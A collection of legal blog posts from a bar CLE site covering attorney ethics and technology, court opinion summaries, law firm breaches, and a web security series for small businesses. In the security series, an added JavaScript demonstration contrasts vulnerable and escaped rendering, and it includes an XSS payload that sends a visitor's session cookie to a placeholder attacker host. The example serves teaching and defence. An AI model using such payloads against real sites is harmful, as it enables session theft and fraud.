April 29, 2017

The Ethical Danger of the Microsoft/LinkedIn Merger

Editor’s Note: This post originally appeared on Stuart Teicher’s blog, “Keeping Lawyers Out of Trouble,” on June 16, 2016. Reprinted with permission.

By Stuart Teicher

This week it was announced that Microsoft is buying LinkedIn. There are some hidden attorney ethics implications about which we all need to be aware.

A review of the recent news articles announcing the acquisition reveals that a key motivating factor in Microsoft’s purchase of LinkedIn was access to LinkedIn’s data.  Of course, sharing data is nothing new. But when companies improve their ability to share our data across various platforms, my ears perk up. Not just because it’s creepy or because of obvious privacy implications. The type of data sharing they’re contemplating in the Microsoft/LinkedIn combination makes me worry about confidentiality (and other) issues.

Why they are merging:

According to the Wall Street Journal, Microsoft sees a critical synergy with LinkedIn:

“LinkedIn’s users are, arguably, Microsoft’s core demographic. They also offer Microsoft something it has long sought but never had—a network with which users identify. Microsoft needs to persuade LinkedIn users to adopt that identity, and use it across as many Microsoft products as possible.

Access to those users, as well as the enormous amounts of data they throw off, could yield insights and products within Microsoft that allow it to monetize its investment in LinkedIn in ways that the professional networking site might not be able to. [Microsoft CEO] Mr. Nadella already has mentioned a few of these, including going into a sales meeting armed with the bios of participants, and getting a feed of potential experts from LinkedIn whenever Office notices you’re working on a relevant task.”

In other words, Microsoft wants to have your Outlook and other Microsoft software products speak to your LinkedIn profile. The intersection of that data is valuable—various sellers of products and services would be willing to pay for it.

It appears that Microsoft wants to be able to read through the work we do on their products like Word, review our upcoming appointments in our Outlook calendar, search for keywords in our emails, and then match the people it finds there against our LinkedIn connections. That’s what they are searching for—connections they could monetize.

For instance, let’s say accountant X has an Outlook Calendar appointment which sets a meeting with “Charles McKenna of Account-Soft Corp.” Microsoft could then search LinkedIn and it would learn that McKenna works for a company that sells workflow management software. Well, now Microsoft knows the accountant is in the market for workflow management software… and they could sell that knowledge to other software companies who would then direct solicitations in the accountant’s direction. That’s an annoyance for an accountant, but a potential ethics disaster if he/she were a lawyer.

Basic issue, Confidentiality:

If Microsoft scours our Word documents and emails, then there could be Rule 1.6 confidentiality issues. That’s so obvious that we don’t need to spend time talking about it now. I think the more unusual issues come from the Calendar function…

If they leverage the data in our Calendar, it could reveal our client relationships:

The substance of what we learn from the client is confidential, but so is the very existence of the lawyer-client relationship. Will the integration of these platforms make it easier for people to figure out who we represent?

Think about how much information Microsoft could piece together from our Calendar. They might see a potential client introduction (which lists Pete Smith as present), a court appearance (which lists Pete Smith as present), and a meeting for settlement purposes (which lists Pete Smith as present). It’s not going to be too tough for the Microsoft bots to figure out that Pete Smith is your client.

If they leverage data in our Calendar, it could reveal key substantive information that could harm the client:

If Microsoft looks at our Calendar they can see that we’re heading to a particular locale. They might then cross reference our LinkedIn connections and send a message to one of them that says something like, “Your connection Bruce Kramer is going to Chicago next week. Why don’t you look him up?”

That heads-up might give someone the incentive to look into our movements a bit more… and who knows what they could find. What if that info was given to a real estate agent that we know in Chicago… and maybe we are representing a successful land owner… and we’re clandestinely scouting a real estate purchase because we don’t want people to figure out that we’re there on behalf of our deep-pocketed client… because if they know, the purchaser will run up the price. That LinkedIn message tipped off the real estate agent and it could cost the client a lot of money.

If they leverage data in our Calendar, it could end up revealing a misrepresentation:

Imagine that Client A asks you to accompany them to a meeting in Los Angeles. You tell her that you can’t go because you’ll be on vacation on the East Coast. That’s not true, however. The truth is that you’ve already scheduled a meeting with a potentially new client in Los Angeles. You didn’t want Client A to know that you’d be in town because you didn’t want to have to shuffle between clients—it would just be too much work. You could have told Client A that you’d be in town but you didn’t have time to meet her, but you thought she’d be insulted. It was just easier to say you’re far away and be done with it.

Later, Client A gets a LinkedIn message that says, “Your Connection Mary Smith is going to be in Los Angeles next weekend… send her a message and try to link up!” Do you know what you are now? Busted. And not only do you have egg on your face, but you may also have committed an ethical violation.

Is the white lie that you told your client going to be considered a misrepresentation or deception per Rule 8.4(c)? That rule states: “It is professional misconduct for a lawyer to (c) engage in conduct involving dishonesty, fraud, deceit or misrepresentation…”

I know what you’re thinking… it was a half-truth. No harm, no foul. Well, I searched the ethics code, and I didn’t find the term “white lie” or “half-truth” anywhere in the code. You should also note that Rule 8.4(c) does not require that the misrepresentation be “material.” It doesn’t allow you to lie about inconsequential things, and there’s no modifying language; it just says that you can’t lie or deceive.

These are just a few issues. Some of these are clear ethics concerns, others are more akin to PR nightmares. Are they so terrible that we all need to get off LinkedIn right away? That might be a bit premature. After all, they only just announced the merging of the platforms; they haven’t actually done anything yet. I don’t know what dangers will actually be realized, or whether any dangers will be realized at all. What I do know is that part of being a responsible attorney in this technological age is to be diligent in thinking about these issues. As lawyers practicing in an ever-changing technological environment, we need to be aware of the potential problems. Keep your eye on the news and stay abreast of the details regarding the integration of these two platforms. Then, if you determine that you need to act, do so. That way we are “keep[ing] abreast of changes in the law and its practice, including the benefits and risks associated with relevant technology.” Comment [8], Rule 1.1.

Save the Date!

Stuart Teicher will be at the CLE offices on Thursday, September 8, 2016, to present two ethics programs. Registration is not yet open, but mark your calendars and don’t miss these important programs.


Stuart I. Teicher, Esq. is a professional legal educator who focuses on ethics law and writing instruction. A practicing attorney for over two decades, Stuart’s career is now dedicated to helping fellow attorneys survive the practice of law and thrive in the profession. Stuart teaches seminars and provides in-house training to law firms/legal departments.

Stuart helps attorneys get better at what they do (and enjoy the process) through his entertaining and educational CLE Performances. His expertise is in “Technethics,” a term Stuart coined that refers to the ethical issues in social networking and other technology. He also speaks about “Practical Ethics”– those lessons hidden in the ethics rules that enhance a lawyer’s practice. Stuart writes the blog “Keeping Lawyers Out of Trouble.”

Mr. Teicher is a Supreme Court appointee to the New Jersey District Ethics Committee where he investigates and prosecutes grievances filed against attorneys, an adjunct Professor of Law at Rutgers Law School in Camden, New Jersey where he teaches Professional Responsibility and an adjunct Professor at Rutgers University in New Brunswick where he teaches undergraduate writing courses. He is a member of the bar in New York, New Jersey and Pennsylvania. In 2014, he authored the book Navigating the Legal Ethics of Social Media and Technology (Thomson Reuters).

Colorado Court of Appeals: Dormant Commerce Clause Not Violated Where Defendant Interacted with Colorado Investigator

The Colorado Court of Appeals issued its opinion in People v. Helms on Thursday, June 16, 2016.

Internet Child Exploitation Statute—CRE 404(b)—Bad Act Evidence—Evidence—Probation Revocation.

Defendant was convicted of two counts of Internet exploitation of a child. He was sentenced to 10 years of supervised probation on each count. The district court later revoked his probation when he failed to register as a sex offender and resentenced him for an indeterminate term of two years to life.

On appeal, defendant contended that the Internet child exploitation statute, C.R.S. § 18-3-405(1)(a), is facially unconstitutional for several reasons. The Court of Appeals disagreed. The statute does not violate the dormant Commerce Clause of the U.S. Constitution because the statute is limited to situations in which the criminal conduct occurs either wholly or partially in Colorado. It also does not violate the First Amendment because it is not overly broad, and it does not violate defendant’s constitutional right to due process because it is not vague.

Defendant also contended that the district court erred by admitting a statement he made, arguing that it was CRE 404(b) bad act evidence. However, the statement was not admitted as evidence of defendant’s bad character; rather, it directly rebutted his defense. Therefore, the district court did not err by admitting this evidence.

Defendant additionally argued that the evidence was insufficient to support his convictions. He argued that his conviction for count one was not supported by sufficient evidence because the jury was instructed that he must have committed the crime in Colorado to be guilty of child exploitation. However, the sufficiency of the evidence is measured against the elements of the offense rather than jury instructions. The child exploitation statute does not require that the actor be in Colorado at the time of the criminal communication. As to the second count, defendant’s conduct did not meet the requirements of the essential elements of the offense. Therefore, this conviction was reversed.

Defendant also argued that the district court erred by denying his motion for a mistrial after a witness testified about an inadmissible matter. Defense counsel elicited the statement from the witness, and although it was prejudicial, the court offered to give a curative instruction to the jury, which defense counsel declined. Therefore, the district court did not abuse its discretion by denying the motion for a mistrial.

Lastly, defendant contended that the district court’s revocation of his probation must be reversed because the district court did not adhere to the applicable statutory requirements. There was not sufficient evidence that defendant waived his right to be advised by the court through counsel, or that he was advised of potential penalties before the probation revocation hearing. In addition, the district court revoked defendant’s probation without obtaining and considering treatment and monitoring recommendations from defendant’s probation officer or treatment provider, as required by statute. Therefore, the district court’s revocation of defendant’s probation was reversed.

The judgment was affirmed in part and reversed in part, and the case was remanded.

Summary provided courtesy of The Colorado Lawyer.

The Internet of Things: A Disrupter? Precarious? The Jetsons?

By John Ritsick, Esq.

Predictions about how much and how quickly technology will change the world can vary – we all can ask “where’s my flying car?” now that the 2015 of “Back to the Future” has come and gone and we still don’t have those flying cars. But the impact of the Internet of Things (IoT) will be significant, and the scope and scale can be mind-boggling. The IoT is the network of physical objects—devices, vehicles, buildings, and other items—embedded with electronics, software, sensors, and network connectivity that enables these objects to collect and exchange data. I work in the manufacturing industry and see the changes coming before they are close to the market, and I am constantly blown away by what we know is coming.

Nearly every industry and every type of tangible item is a potential participant in the IoT. The industries affected include automotive, transportation, city infrastructure, homes and household goods, retail stores—virtually all industries can potentially be incorporated into the IoT. Self-driving cars necessarily mean the car is connected to the Internet and is “smart” technology, but a self-driving car also means that other cars and vehicles are connected, that the roads the cars drive on and traffic systems are part of a larger environment, and that our emergency response services are connected as well.

I’ll be moderating a talk on the IoT at the 2016 Rocky Mountain IP & Technology conference in Denver in June. My colleague at Flex, Kenji Takeuchi, leads Products and Technology Management for Flex’s Connected Living and IoT Software business. He’ll be talking about this subject and other thoughts on where technology is headed—it will be an insightful look into the future!

John Ritsick, Esq., is in-house counsel at Flex, a global leader in the categories of design, manufacturing, distribution, and aftermarket services. Find out more about the 2016 IP & Technology Institute at the links below.


CLE Program — 14th Annual Rocky Mountain Intellectual Property & Technology Institute

This CLE presentation will occur on June 2-3, 2016, at the Westin Westminster Hotel. Register online or call (303) 860-0608.

Can’t make the live program? Order the home study here: CDMP3

Two Law Firm Hacks Should Be Scaring Your Firm Into Action

Editor’s Note: This post originally appeared on Stuart Teicher’s blog, “Keeping Lawyers Out of Trouble,” on April 4, 2016. Reprinted with permission.

By Stuart Teicher

For years people have been warning that law firms of all sizes are major targets for cyber-criminals. If your firm didn’t take that seriously before, then there are two major hackings last week that should get your attention.

The Wall Street Journal reported that cyber criminals breached Cravath, Weil Gotshal, and several other unnamed firms (read the article here: http://on.wsj.com/1MzYlN2). The paper states that it’s not clear what (or whether) information was taken, but the focus is on the possibility of confidential information being stolen for purposes of insider trading.

The other major breach is so big that it has its own hashtag— search Twitter for #PanamaPapers or #PanamaLeaks. According to Reuters, the target was a law firm in Panama that specializes in setting up offshore companies. Hackers stole data from the firm and provided that data to journalists who promptly revealed it to the public (read the article here: http://reut.rs/25GEy4X). The information allegedly reveals a network of offshore loans. According to the BBC, the stolen data reveals how the law firm “has helped clients launder money, dodge sanctions and avoid tax” (read the BBC’s article here: http://www.bbc.com/news/world-35918844). Political figures and friends of popular politicians are allegedly implicated, according to the report.

My concern is not about the obvious political ramifications. My concern is about the ethical ramifications to lawyers. The danger of hacking is real.

No report has implicated any type of ethical wrongdoing on the part of any firm. That needs to be restated and made abundantly clear: there has been no report of any evidence of ethical impropriety by any of the law firms mentioned in the news. I am bringing this to your collective attention because it should serve as a warning. Confidential client information was stolen from that law firm in Panama… which reminds us that we are targets.

All lawyers are targets. Small firms, large firms, in-house counsel, government lawyers, you name it. The bad guys know that lawyers are the custodians of valuable information and they are coming after us in a big way. The message for all of us is clear: you could be subject to an ethics grievance if you don’t take proper steps to secure your clients’ information.

The responsibility to protect our client information is nothing new. However, these recent events require us to apply an increased sense of urgency to evaluating our compliance with that duty. Have you, or your firm, taken the necessary steps to adequately protect your clients’ information? Have you considered the fact that bad guys could be targeting you? What steps have you taken to counteract the potential piracy that could be aimed at your clients’ information?

You can be darn sure that someone is going to be asking those questions of the firms that were targeted in the hacks. Maybe you need to put yourself in their position and ask, “how would we fare if that review was directed toward us?”

Our duty of competence requires that we take appropriate steps to protect our clients’ confidential information. And remember that you, as the lawyer, have the primary ethical duty, not your IT people. Furthermore, various ethics opinions have held that, in some circumstances, the lawyer needs to understand the underlying technology itself.

If these issues weren’t on the front burner in your office before, these two hacks should be causing you to shift your priorities.

Quickly.

New Legal Technology: Reduced Risk, Increased Flexibility, Automated Systems—Better for Lawyers

It’s estimated that 90% of lawyers use mobile to check email; 34% of lawyers use tablets in the courtroom; 27% of law firms have legal blogs; 10% of individual lawyers have blogs; 48% use a tablet at work (and the tablet is capturing laptop share); 17% use litigation support software; 39% of blogs resulted in clients or referrals; 40% of solos and 30% of all lawyers use cloud services; and 58% use Dropbox to transfer and store files. Technology (including legal technology) moves fast, with new products and updates arriving at a dizzying pace.

Wouldn’t it be nice if this burgeoning technology resulted in less time in the office and an increase in billings? Many attorneys are finding this to be the case. Automating systems and keeping better track of files and cases has actually resulted in more flexibility and peace of mind for attorneys, even those having to juggle more responsibilities. In addition, smaller firms have discovered by using new technologies they are able to better compete with larger firms.

This year’s first Colorado Legal Technology Expo is October 27-28, 2014, at the CBA-CLE offices in Denver. The Legal Technology Expo is free and the place for the technology and legal communities to interact and to mutually benefit.

Not only will there be legal technology companies exhibiting, but short, educational seminars offered on the latest in technology for the legal community. Legal technology tips and best practices will be shared by experts with topics that include: Managing Interruption and Info Overload; Cloud Security; E-Recording; Using the Latest in Technology to Market Your Law Firm; and 5 Technologies Every Lawyer Should be Using Today.

We invite you to drop by, even for an hour or two, to the free Legal Tech Expo. Click here to find out more and to register for the 20-30 minute educational seminars.

CLE Program: The 2014 Colorado Legal Technology Expo

This CLE presentation will take place from Monday, October 27 through Tuesday, October 28, 2014. Click here to register.


Tenth Circuit: Special Master Must Employ Abstraction-Filtration-Comparison Test for Copyright Infringement

The Tenth Circuit Court of Appeals issued its opinion in Paycom Payroll, LLC v. Richison on Friday, July 11, 2014.

David Richison, with his niece and nephew, Shannon and Chad Richison, formed a payroll processing company, Ernest Group, d/b/a Paycom Payroll, in Oklahoma in the 1990s. During his time with Ernest Group, David wrote two payroll processing software programs, BOSS and Independence. He transferred his authorship interest in BOSS to Ernest Group in the 1990s. When the relationship between David and Chad deteriorated in 2001, David moved to Maryland and formed his own company called Period Financial Corporation. At Period, he wrote a new software program based in part on Independence, which he called Period Indy. In May 2009, Ernest Group filed a copyright infringement lawsuit against David, asserting that Period Indy infringed on Ernest Group’s copyright in BOSS. Ernest Group subsequently filed for copyright on Independence, stating that it was a work for hire. By 2011, David had written another program, Cromwell.

In August 2011, the parties settled and agreed to the entry of a consent decree. All of Ernest Group’s claims were released except its claim for injunctive relief based on copyright infringement, and all rights to Independence were assigned to Ernest Group. The parties agreed that the district court should appoint a special master to write a report regarding whether the Cromwell program infringed on either BOSS or Independence, and the district court should decide the issue based on the special master’s report. The parties disagreed as to which version of Cromwell should be used for the analysis, but not which versions of BOSS and Independence. The special master opined in his report, marked “Attorney’s Eyes Only,” that Cromwell infringed upon both BOSS and Independence. The district court adopted the special master’s findings and ordered that all copies of Cromwell should be destroyed.

After the report was filed, David objected to the “Attorney’s Eyes Only” restriction, noting that as the author of all the software in question, he could assist his attorneys in reviewing the substance of the report. Ernest Group opposed the motion, and the district court denied it, stating that David advanced no grounds to support lifting the restriction. David’s attorneys filed objections to the special master’s report, arguing that the special master failed to conduct the abstraction-filtration-comparison test, or at least that he did not document his application of the test. Ernest Group’s attorneys agreed with the objections to some extent and requested that the report be resubmitted to the master for further findings. Before the district court could rule, Ernest Group’s attorneys mailed David’s “highly critical” objections directly to the special master. David’s attorneys called for a new special master, claiming that Ernest Group had irrevocably tainted the master’s neutrality. The district court, instead of resubmitting the report to the special master, called on Ernest Group’s attorneys to offer a more substantive response to David’s critique of the report, which they did. The district court adopted the special master’s report in its entirety, ruled that Cromwell infringed upon Ernest Group’s copyrights in both BOSS and Independence, and ordered all copies of Cromwell destroyed. This appeal followed.

David raised four issues on appeal: (1) the “Attorney’s Eyes Only” restriction should be lifted, (2) the special master erred by evaluating versions of BOSS and Independence that were never registered with the copyright office, (3) the special master’s report was inadequate and the versions were not substantially similar, and (4) a new special master should be appointed if remand is necessary. The Tenth Circuit evaluated these claims in turn. The Tenth Circuit declined to agree with David on the first claim, noting that he agreed to the restriction in a consent decree and that allowing David to view the report was not so fundamental a right as to be unwaivable, and commenting that such restrictions are common in trade secret litigation. For the second claim, the Tenth Circuit similarly rejected David’s arguments, since he impliedly consented to the versions in two documents submitted to the court and his argument was therefore waived.

As to the third claim, the Tenth Circuit reversed the district court’s adoption of the special master’s report. The Tenth Circuit agreed that the special master should have documented his application of each step of the abstraction-filtration-comparison test, which he did not do. The report contained little evidence that the master performed the abstraction test, and in fact the report seemed to deem abstraction superfluous. Because the abstraction test was not performed, the special master’s findings regarding filtration were limited, and his entire analysis was flawed. The case was remanded for more complete reporting by the special master. In his fourth claim, David requested that a new special master be appointed, due to potential bias from the master receiving David’s critique. The Tenth Circuit disagreed, because the parties had agreed to this particular special master, and also noting that it only addressed David’s contentions in this appeal so if need arose for a different special master in the future that claim would not be barred.

The district court’s judgment was reversed and remanded for further reporting by the special master using the abstraction-filtration-comparison test.

Tenth Circuit: FCC Denial of Petition for Regulatory Forbearance Pertaining to Telecommunications Services Was Reasoned and Reasonable

The Tenth Circuit Court of Appeals published its opinion in Qwest Corp. v. FCC on Monday, August 6, 2012.

The Tenth Circuit denied the petition for review. Petitioner sought “review of an order of the Federal Communications Commission (FCC) denying Petitioner’s petition for regulatory forbearance pursuant to 47 U.S.C. § 160(a). Petitioner filed a petition with the FCC in March 2009 seeking relief from certain regulations pertaining to telecommunications services that it provides in the Phoenix, Arizona, metropolitan statistical area (MSA). The FCC denied the petition, citing insufficient evidence of sufficiently robust competition that would preclude Petitioner from raising prices, unreasonably discriminating, and harming consumers. Petitioner challenges the FCC’s decision only as it pertains to Petitioner’s mass-market retail services in the Phoenix MSA.” The Court denied the petition, finding that the Phoenix Order was a reasoned and reasonable decision.

Law Firms and Small Businesses: Protecting Security Interests (Part 2)

Editor’s Note: This is the second in a two-part series of cyber security articles. Part one can be found here.

Reasonable Contractual Expectations

One of my best contractual stories revolves around a conversation with the president of a local web site design firm – a good friend and one who feels comfortable with being candid with me. During one of his development projects, I offered to do a free security evaluation of the soon-to-be-released web application. His rejection of my offer came with the rationale that if the web application was ever compromised, he wanted to be able to honestly tell the client that, to the best of his knowledge, the delivered web site was secure.

I haven’t the faintest idea of the legality of my friend’s hope for plausible deniability, but it should be obvious that two very poor consequences come out of his approach to security. The first is that his client will end up with an insecure web site, when they could just as easily have had a product that would have withstood all but the most experienced and persistent hackers.

The second eye-opening realization is that the client never asked about security, and the development contract never addressed security. In this case, the client (and potentially the law firm that reviewed the contract) never included security development and testing as one of the primary requirements of the relationship. A single section added to the development contract might have the effect of preventing a devastating security breach.

A favorite statement of mine goes as follows:

Businesses end up with a lack of security because they never, ever ask about it. 

Almost all web site development contracts include obvious legal details like payment schedules, software ownership, and product specifications. These terms protect the interest of the business as well as the development firm – standard boilerplate.

A well-written contract should also include a requirement that the contracted web site be developed under strict security guidelines (consider OWASP as a source of information) and that a comprehensive third-party security penetration test (Acunetix is one such testing tool) be run and its results presented before product acceptance.

The additional cost for security-oriented development should be minimal, since a knowledgeable development firm should be adhering to these practices regardless of a request. The third-party security penetration test can be contracted for with one of many firms and should cost only a few thousand dollars.

Again, the role of a law firm in this environment should certainly be the crafting and approval of the basic development contract, but also making sure security validation is a well-defined requirement of the overall agreement.

How to Respond After a Breach

When a security breach does occur, businesses (and their counsel) need to be ready to react thoroughly and decisively. A few of my suggestions for the days, weeks, and months following a breach are:

  • Don’t panic. Carefully consider the nature of the breach, what data (if any) has been compromised, and what the business’s next steps should be. Preserve the evidence (server logs, affected systems) before anyone starts cleaning up, since any forensic investigation will depend on it. A premature release of breach information may cause unnecessary customer panic or, even worse, make management look even more inept when information sent out too hastily has to be revised. Advise them to take the time to respond with dignity and thoughtfulness.
  • If required, inform the appropriate financial and legal entities as soon as possible. Depending on the industry and the jurisdiction, there may be strict requirements for reporting security breaches (state breach-notification laws, card-brand rules for payment data, HIPAA for medical data). Your client’s problem will only get worse if they are caught hiding information. Keep in mind that many security breaches become public knowledge because the compromised data is used or sold in the cyber underground, not because the company disclosed them. As a side note, an embarrassingly large number of security breaches are never discovered by the company that was breached.
  • Inform users, clients, and customers as soon as appropriate. There is a line between keeping a company viable and an ethical responsibility to customers. My thoughts on where that line falls: consider the damage that might be done to customers and think about how you would expect to be treated.
  • Call the insurance company. Depending on the nature of the breach, the business may be covered for some, if not all, of the expenses associated with recovery. Suggest that the business give their insurance company a call. They might also take the time to talk about cyber insurance with their agent – for the next time.

As a legal professional, you should easily be able to see the pitfalls inherent in panic-stricken businesses reacting to security breaches. The legal, financial, and professional stakes surrounding a security breach may be high enough to shut down the business. The correct reaction may be well outside the expertise of the business, or, even worse, the business may naively attempt to react on its own.

Conclusion

Hopefully, I have provided food for thought on the security opportunities and responsibilities of law firms supporting small businesses and their own technological infrastructure. Obviously, I’ve brought up far more issues and concerns than solutions. My hope is that even a casual discussion of security problems will prepare you with far more knowledge than the majority of your clients.

It’s a mean world out there; much of cyber crime is run as an industry from countries where cyber criminals are not prosecuted. A widely cited industry estimate is that more than 70% of all Internet web sites contain critical security vulnerabilities. Many of your clients’ web sites, and undoubtedly some of your own, are on the wrong side of this depressing number.

One final note to add one more level of worry: web application security awareness has only recently entered mainstream web site development. If your web site or your client’s is more than four years old, it very likely contains critical vulnerabilities, and it is probably a target for even the most amateurish attackers: script kiddies, young people who hack web sites with downloaded tools because doing so is more fun than playing a predictable Xbox game.

Alan Wlasuk is a managing partner of 403 Web Security, a full service, secure web application development company. A Bell Labs Fellow award-winner with 18+ years of experience building secure web applications, Wlasuk is an expert in web security – from evaluation to web development and remediation.

Learn More: Cyber Security/Privacy CLE Homestudy Programs

Is Your Sensitive Data Secure: Cyber Insurance for Your Firm and Your Clients (video on-demand and mp3 download)

Avoiding The Lawyer’s Digital Nightmare: How To Safeguard Your and Your Clients’ Sensitive Information And Survive The Inevitable (?) Security Breach (video on-demand, mp3 download, and audio CD)

Ethics in a Wild Wired World (video on-demand, mp3 download, and audio CD)

To Use and Protect: Privacy Basics for Business (video on-demand and mp3 download)

Law Firms and Small Businesses: Protecting Security Interests (Part 1)

Editor’s Note: This is the first in a two-part series of cyber security articles. Part two can be found here.

Is there anything more financially fragile than a small business in the U.S. today? As we climb out of the Great Recession, many of the surviving small businesses were forced to cut corners, often making compromises on the IT side. Combine this with an unprecedented rise in cyber crime, which by one estimate took the 2011 U.S. cost of security breaches to $32 billion, and one can easily predict the future security troubles of many small businesses.

As legal, and sometimes operational and financial, advisers to small businesses, law offices should be more aware than ever of the security risks to small business clients, understand how to mitigate these risks, and lend support when a security breach occurs.

These considerations are also important for attorneys to make regarding their own online presence and security risks, especially solo/small firm practitioners.

While I can’t cover IT security in its entirety here, I’ll touch on three areas, each of which should give you an idea of security troubles ahead and what you might be doing to anticipate these troubles:

  1. Professional and financial liabilities
  2. Reasonable contractual expectations
  3. Responses after a breach

To set the stage for my thoughts on the advice and support a law office might provide to small businesses (and might consider for itself, or at least be aware of), let me start by sharing a few details of my background. I am the managing partner of 403 Web Security, a web application security company, and WDDinc, a software development firm with close to 20 years of developing software, much of it for small businesses. While I am not a legal expert, I have seen more than my share of software-related contracts and have a firsthand view of the risks these organizations place themselves under.

For the sake of simplicity, and to take full advantage of my experience, I’ll limit my notes to web application security, that is, the security of a small business’s own web site.

Professional and Financial Liabilities

Without hesitation, I can say that the vast majority of small businesses not only have inadequate security protections in place, but also are oblivious to the fact they are security risks. Even worse, recent headlined security breaches of high-profile companies seem to engender only a misguided belief that they are immune from security attacks because they are small fish in a huge ocean.

The truth is, not only are small businesses not immune from attack, they are prime targets because of their lack of security. Consider the monetary value of even small, undetected breaches – unlimited time to exploit compromised data and the opportunity to revisit the sources months and years into the future.

When considering security liabilities, I like to separate small businesses into two categories. The first would be those businesses that collect and save protected data (e.g., medical records or identity information) within their own environments. The web sites that support these businesses tend to be custom built by design or development companies that have little or no experience in creating secure web sites, and almost never have the capability to test new sites for security vulnerabilities. These businesses are potentially open to large fines when that data is compromised.

The second, and larger, category is small businesses with e-commerce components. These businesses usually, and wisely, use well-established (and secure) external web services to handle credit card and other payment transactions. Unfortunately, this approach works only when the business’s own web site is secure. The point almost always missed is that a hacker does not always breach a web site for its underlying data. For example, a hacked site may be modified in subtle ways to send an unsuspecting consumer to a fraudulent checkout page that will happily collect and exploit the consumer’s credit card as soon as it is entered. Or, one of my favorite security flaws, Cross-Site Scripting (XSS), might let an attacker run script in a legitimate user’s browser in the context of the site, hijacking that user’s session and e-commerce transactions; combined with a browser exploit, it can be the first step toward compromising the user’s entire computer.
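Here is an added example, not code from the original article or from 403 Web Security, that makes the XSS point concrete in JavaScript. It assumes a hypothetical storefront that echoes the visitor’s search term back into the page. The payload string is constructed for the example: it sends the shopper to a made-up fraudulent checkout address and carries the session cookie along, which is exactly the redirect-to-fake-checkout trick described above. The vulnerable renderer concatenates the term straight into HTML; the hardened one escapes it first.

```javascript
// Added example (not from the original article): a reflected cross-site
// scripting (XSS) bug in a hypothetical small-business storefront, beside
// the hardened version. Node.js or a browser console will run it.

// Constructed sample payload, the kind of thing a script kiddie pastes into a
// search box: it sends the shopper to a fraudulent checkout (a made-up host)
// and leaks the session cookie along the way.
const SAMPLE_PAYLOAD =
  '<script>location="https://evil.example/checkout?c="+document.cookie</script>';

// VULNERABLE: the visitor's search term is concatenated straight into HTML,
// so any markup in it becomes part of the page and runs as the site itself.
function renderSearchVulnerable(term) {
  return '<h2>Results for: ' + term + '</h2>';
}

// Escape the five characters that matter in element content and quoted
// attribute values. (Other contexts, e.g. inside a <script> block or a URL,
// need their own encoding; this helper is for HTML text only.)
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// HARDENED: same template, but untrusted input is escaped before insertion,
// so the browser shows the payload as literal text instead of executing it.
function renderSearchSafe(term) {
  return '<h2>Results for: ' + escapeHtml(term) + '</h2>';
}

// A deliberately crude check for the demonstration: does the rendered HTML
// still contain an executable <script> tag? A real test would load the page in
// a browser or a DOM parser; this is enough to show the difference here.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Defence in depth beyond escaping (not demonstrated in code): mark the session
// cookie HttpOnly so script cannot read document.cookie, and send a
// Content-Security-Policy header that forbids inline script.

console.log('vulnerable:', containsScriptTag(renderSearchVulnerable(SAMPLE_PAYLOAD))); // true
console.log('hardened:  ', containsScriptTag(renderSearchSafe(SAMPLE_PAYLOAD)));      // false
```

Run it with node and the vulnerable renderer reports true while the hardened one reports false. The escaping must match where the value lands: the helper above is correct for HTML element content and quoted attributes, and a value placed inside a script block, a URL, or a CSS rule needs a different encoder, which is why the contract language in Part 2 asks for a security review rather than a single fix.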

In either case, a small business may be financially and legally liable for the fraud and illegitimate use of information from its security breaches. Perhaps just as importantly, the loss of reputation and consumer confidence alone might be enough to ruin any small business.

A proactive law firm might be in a unique position to address potential security issues and breach consequences with their clients. This should be part of the support of any client and attorneys should heed the same advice themselves.

Alan Wlasuk is a managing partner of 403 Web Security, a full service, secure web application development company. A Bell Labs Fellow award-winner with 18+ years of experience building secure web applications, Wlasuk is an expert in web security – from evaluation to web development and remediation.

Colorado Supreme Court: PUC Considered All Mandated Factors in Setting Rates for Basic Residential Phone Service with Evidence to Support Decision

The Colorado Supreme Court issued its opinion in Colorado Office of Consumer Counsel v. Colorado Public Utilities Commission on April 30, 2012.

Basic Residential Telephone Service Regulation—Maximum Rate Setting.

The Supreme Court reversed the district court’s judgment, holding that the Colorado Public Utilities Commission (PUC) regularly pursued its authority in setting maximum rates for basic residential telephone service pursuant to CRS § 40-15-502(3)(b). The PUC considered all of the statutorily mandated factors in setting the rates and there was substantial evidence supporting its decision.

Summary and full case available here.

Cyber Insurance: An Efficient Way to Manage Security and Privacy Risk

Practically every company in our modern economy has information security and privacy risk. There is no way to completely eliminate it. Whether it is your firm or your client, most companies of all shapes, sizes, and wealth profiles use information technology and handle sensitive information including personal information and credit card numbers. That means organizations face potential direct losses, lawsuits, and liability due to data, security, and privacy breaches.

The frequency and magnitude of data breaches by hackers has only been increasing. We read about security and privacy breaches practically every day in the newspaper. As the world continues to change at seemingly light-speed and cyber risks increase, the need for risk transfer with cyber insurance is also growing. Relying on a general liability or property policy to provide the coverage is no longer a wise choice (if it ever was), and companies could be well-served to get peace of mind and relative predictability by learning more about cyber policies that are actually designed to address the risk.

CBA-CLE will hold a program on Thursday, March 29 to address the impact of data breaches and the trend toward cyber insurance. The program presenter, David Navetta, Esq., has written several articles about data security and cyber insurance. Read some of his insights below, and then join us to learn more about protecting sensitive information with cyber insurance, an option that may be of great importance to your clients or law firm.

In the early 2000s, just around the “DotCom Bust,” some insurers began developing a product designed to address the financial loss that might arise out of a data breach. This was a time where most “brick and mortar” companies were just beginning to leverage the economic potential of the Internet. At that time, insurers wanted to target the big “dotcom” companies like Amazon, Yahoo, eBay, Google, etc., and other companies pioneering e-commerce and online retailing. At some point, somebody dubbed this type of insurance “cyber insurance.”

The early cyber policies included liability and property components. The liability coverages addressed claim expenses and liability arising out of a security breach of the insured’s computer systems (some early policies only covered “technical” security breaches, as opposed to policy violation-based security breaches). The property-related components covered business interruption and data asset loss/damage arising out of a data breach (during the holiday season many online retailers suddenly developed a taste for business interruption coverage after realizing just how negatively their business would be impacted by a denial of service attack). Additional first party coverages included cyber-extortion coverage and crisis management/PR coverage.

Unfortunately for the carriers, it was not easy to get people to understand the need for this coverage (and that is still a challenge today, but certainly a lesser challenge with all of the security and privacy news constantly streaming). Early on there were very few lawsuits and regulators were just beginning to consider enforcement of relatively new statutes like GLB and HIPAA.

Two things changed that made cyber insurance much more relevant. One was a rather sudden event, and the other more gradual.

